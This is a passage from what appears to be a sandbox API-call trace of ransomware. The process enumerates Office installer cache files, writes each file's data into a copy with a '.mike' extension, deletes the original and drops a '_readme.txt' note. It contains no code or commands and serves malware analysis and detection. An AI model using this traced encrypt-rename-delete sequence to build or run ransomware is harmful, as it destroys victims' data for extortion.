cAlternateFileName="PROPLU~1.XML")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.714] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.725] GetFileType (hFile=0x264) returned 0x1 [0041.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.725] GetFileType (hFile=0x264) returned 0x1 [0041.725] CloseHandle (hObject=0x264) returned 1 [0041.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.725] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.726] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2298170 | out: lpFileInformation=0x2298170*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.726] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x22984a8 | out: lpFileInformation=0x22984a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.726] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.726] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.727] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.727] GetFileType (hFile=0x264) returned 0x1 [0041.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.727] GetFileType (hFile=0x264) returned 0x1 [0041.727] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.727] WriteFile (in: hFile=0x264, lpBuffer=0x22993e4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22993e4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.728] CloseHandle (hObject=0x264) returned 1 [0041.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.728] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2298eb8 | out: lpFileInformation=0x2298eb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2)) returned 1 [0041.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.728] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.729] GetFileType (hFile=0x264) returned 0x1 [0041.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.729] GetFileType (hFile=0x264) returned 0x1 [0041.729] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.729] ReadFile (in: hFile=0x264, lpBuffer=0x229a520, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x229a520*, lpNumberOfBytesRead=0x2af110*=0x10b2, lpOverlapped=0x0) returned 1 [0041.730] CloseHandle (hObject=0x264) returned 1 [0041.731] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.731] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.731] GetFileType (hFile=0x264) returned 0x1 [0041.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.731] GetFileType (hFile=0x264) returned 0x1 [0041.731] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.731] WriteFile (in: hFile=0x264, lpBuffer=0x22a2634*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x22a2634*, lpNumberOfBytesWritten=0x2af124*=0x10c0, lpOverlapped=0x0) returned 1 [0041.731] CloseHandle (hObject=0x264) returned 1 [0041.732] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.732] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.732] GetFileType (hFile=0x264) returned 0x1 [0041.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.732] GetFileType (hFile=0x264) returned 0x1 [0041.733] WriteFile (in: hFile=0x264, lpBuffer=0x22a5a74*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22a5a74*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.733] CloseHandle (hObject=0x264) returned 1 [0041.734] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.734] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.734] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe312bcc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe312bcc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3151e20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.735] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.735] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike", lpFilePart=0x0) returned 0x52 [0041.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.735] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22a7234 | out: lpFileInformation=0x22a7234*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe312bcc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe312bcc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3151e20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.735] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.735] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0041.735] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.735] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0041.736] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.736] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.736] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.736] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.736] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.737] GetFileType (hFile=0x264) returned 0x1 [0041.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.737] GetFileType (hFile=0x264) returned 0x1 [0041.737] WriteFile (in: hFile=0x264, lpBuffer=0x22a8f54*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x22a8f54*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.738] CloseHandle (hObject=0x264) returned 1 [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpFilePart=0x0) returned 0x4d [0041.738] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.739] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.739] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.739] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.743] GetFileType (hFile=0x264) returned 0x1 [0041.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.743] GetFileType (hFile=0x264) returned 0x1 [0041.743] CloseHandle (hObject=0x264) returned 1 [0041.743] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.743] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpFilePart=0x0) returned 0x4d [0041.743] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.743] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.743] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b7ea4 | out: lpFileInformation=0x22b7ea4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4)) returned 1 [0041.743] SetThreadErrorMode (dwNewMode=0x0, 